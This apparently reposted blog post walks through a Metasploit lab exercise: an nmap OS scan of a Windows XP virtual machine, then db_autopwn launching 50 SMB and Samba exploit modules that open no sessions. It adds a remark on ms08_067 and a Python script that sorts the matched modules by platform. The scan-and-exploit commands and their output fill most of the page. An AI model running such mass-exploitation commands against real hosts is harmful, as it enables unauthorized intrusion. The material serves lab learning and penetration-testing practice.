Metasploit db_autopwn in Practice

Source: Internet  Editor: 程序博客网  Time: 2024/05/19 22:48
msf > db_nmap -O 192.168.1.142
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-05-14 20:12 EDT
[*] Nmap: Nmap scan report for 192.168.1.142
[*] Nmap: Host is up (0.00047s latency).
[*] Nmap: Not shown: 997 filtered ports
[*] Nmap: PORT     STATE  SERVICE
[*] Nmap: 139/tcp  open   netbios-ssn
[*] Nmap: 445/tcp  open   microsoft-ds
[*] Nmap: 2869/tcp closed icslap
[*] Nmap: MAC Address: 00:0C:29:F1:31:D2 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running (JUST GUESSING): Microsoft Windows XP|2003|2000 (99%)
[*] Nmap: Aggressive OS guesses: Microsoft Windows XP SP3 (99%), Microsoft Windows XP (97%), Microsoft Windows Server 2003 SP1 or SP2 (97%), Microsoft Windows Server 2003 SP2 (97%), Microsoft Windows 2000 SP4 (95%), Microsoft Windows XP SP2 (95%), Microsoft Windows XP SP2 or SP3 (95%), Microsoft Windows Small Business Server 2003 (95%), Microsoft Windows XP Professional SP2 (95%), Microsoft Windows 2000 SP0 (95%)
[*] Nmap: No exact OS matches for host (test conditions non-ideal).
[*] Nmap: Network Distance: 1 hop
[*] Nmap: OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.48 seconds
msf > hosts

Hosts
=====

address        mac                name  os_name            os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------            ---------  -----  -------  ----  --------
192.168.1.142  00:0C:29:F1:31:D2        Microsoft Windows  XP                device

msf > db_autopwn -p -t -e
[*] Analysis completed in 7 seconds (0 vulns / 0 refs)
[*] 
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:139  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:139  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:139  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:139  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:139  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*]   192.168.1.142:445  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/chain_reply  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/linux/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/nttrans  (port match)
[*]   192.168.1.142:445  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:445  exploit/netware/smb/lsass_cifs  (port match)
[*]   192.168.1.142:445  exploit/osx/samba/lsa_transnames_heap  (port match)
[*]   192.168.1.142:445  exploit/solaris/samba/trans2open  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/ca_arcserve_342  (port match)
[*]   192.168.1.142:445  exploit/windows/brightstor/etrust_itm_alert  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms03_049_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_011_lsass  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms04_031_netdde  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/netidentity_xtierrpcpipe  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*] 
[*] 
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
[*] (2/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:139...
[*] (3/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (4/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:139...
[*] (5/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:139...
[*] (6/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:139...
[*] (7/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:139...
[*] (8/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:139...
[*] (9/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:139...
[*] (10/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:139...
[*] (11/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:139...
[*] (12/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:139...
[*] (13/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:139...
[*] (14/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:139...
[*] (15/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:139...
[*] (16/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:139...
[*] (17/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:139...
[*] (18/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:139...
[*] (19/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:139...
[*] (20/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:139...
[*] (21/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:139...
[*] (22/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:139...
[*] (23/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:139...
[*] (24/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:139...
[*] (25/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:139...
[*] (26/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:445...
[*] (27/50 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.1.142:445...
[*] (28/50 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (29/50 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.142:445...
[*] (30/50 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.1.142:445...
[*] (31/50 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.1.142:445...
[*] (32/50 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.1.142:445...
[*] (33/50 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.1.142:445...
[*] (34/50 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.1.142:445...
[*] (35/50 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.1.142:445...
[*] (36/50 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.1.142:445...
[*] (37/50 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.1.142:445...
[*] (38/50 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.1.142:445...
[*] (39/50 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.1.142:445...
[*] (40/50 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.1.142:445...
[*] (41/50 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.1.142:445...
[*] (42/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.1.142:445...
[*] (43/50 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.1.142:445...
[*] (44/50 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.1.142:445...
[*] (45/50 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.1.142:445...
[*] (46/50 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.1.142:445...
[*] (47/50 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.1.142:445...
[*] (48/50 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.1.142:445...
[*] (49/50 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.142:445...
[*] (50/50 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 11 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (50/50 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
msf > 


The target in this exercise is XP SP3. Run on its own, ms08_067_netapi exploits it successfully. Run through the automated db_autopwn, however, it does not.

Before running db_autopwn, the module list should be filtered.
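
The match list above is built on port number alone, so it ignores the OS that the hosts table already records. The following is an added example, not part of the original post or of Metasploit: it parses "port match" rows and sorts them by whether the module path's platform agrees with the recorded os_name. It assumes the platform is the path component directly after exploit/, and it treats multi as ambiguous; the function names and the sample are constructed for illustration.

```python
import re

# Constructed sample: lines copied from the console session above
# (five "port match" rows plus one "Launching" row that must be ignored).
SAMPLE = """\
[*]   192.168.1.142:139  exploit/freebsd/samba/trans2open  (port match)
[*]   192.168.1.142:139  exploit/multi/samba/usermap_script  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.1.142:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.1.142:445  exploit/solaris/samba/trans2open  (port match)
[*] (1/50 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.1.142:139...
"""

# Row shape: "[*]   <ip>:<port>  exploit/<platform>/<rest>  (<reason> match)"
ROW = re.compile(r"^\[\*\]\s+(\S+):(\d+)\s+exploit/([^/\s]+)/(\S+)\s+\((\w+) match\)")

def parse_matches(text):
    """Return one dict per row of the 'Matching Exploit Modules' table."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            host, port, platform, rest, reason = m.groups()
            rows.append({"host": host, "port": int(port), "platform": platform,
                         "module": f"exploit/{platform}/{rest}", "reason": reason})
    return rows

def triage(rows, os_name):
    """Bucket modules by agreement between path platform and recorded OS name."""
    os_l = os_name.lower()
    buckets = {"consistent": [], "mismatch": [], "ambiguous": []}
    for r in rows:
        if r["platform"] == "multi":      # assumption: cannot be judged from the path
            key = "ambiguous"
        elif r["platform"] in os_l:       # e.g. "windows" in "microsoft windows"
            key = "consistent"
        else:
            key = "mismatch"
        buckets[key].append(r["module"])
    return buckets

if __name__ == "__main__":
    for key, mods in triage(parse_matches(SAMPLE), "Microsoft Windows").items():
        print(key, len(mods), mods)
```

Applied to the full table in the session, the same grouping puts 16 of the 25 modules per port under windows; the other 9 carry freebsd, linux, multi, netware, osx or solaris paths.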